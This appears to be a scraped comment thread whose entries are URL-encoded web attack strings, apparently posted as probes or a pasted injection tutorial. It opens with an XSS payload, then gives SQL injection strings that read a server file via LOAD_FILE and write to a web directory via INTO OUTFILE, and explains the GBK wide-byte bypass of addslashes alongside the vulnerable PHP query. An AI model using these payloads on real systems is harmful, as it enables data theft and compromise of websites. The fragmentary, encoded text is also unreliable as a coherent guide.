"><img src=x onerror=prompt(1);>
UNION%20SELECT%20LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116))%20%23
2025-05-20 06:22:59 回复
UNION%20SELECT%20DATABASE()%20INTO%20OUTFILE%20'C%3a%5c%5cphpstudy%5c%5cWWW%5c%5ctest%5c%5c1'%3b
2025-05-20 06:22:59 回复
addslashes%20()%20adds%20a%20single%20or%20double%20quotation%20mark%20%5c%2e%20When%20mysql%20GBK%20character%20set,%20it%20will%20be%20two%20characters%20as%20a%20Chinese%20character,%20such%20as%%20df%%205c%20for%20transport%2e%20We%20enter%20name%3droot%df%27,%%20the%20server%20will%20appear%20the%20following%20conversion%3a%20root%df%27-%3e%20root%df%5c%27-%3e%20rootK'%2e
2025-05-20 06:22:58 回复
$name%20%3d%20isset($_GET['name'])%20%3f%20addslashes($_GET['name'])%20%3a%201%3b
2025-05-20 06:22:58 回复
$sql%20%3d%20%22SELECT%20%2a%20FROM%20test%20WHERE%20names%3d'%7b$name%7d'%22%3b
2025-05-20 06:22:58 回复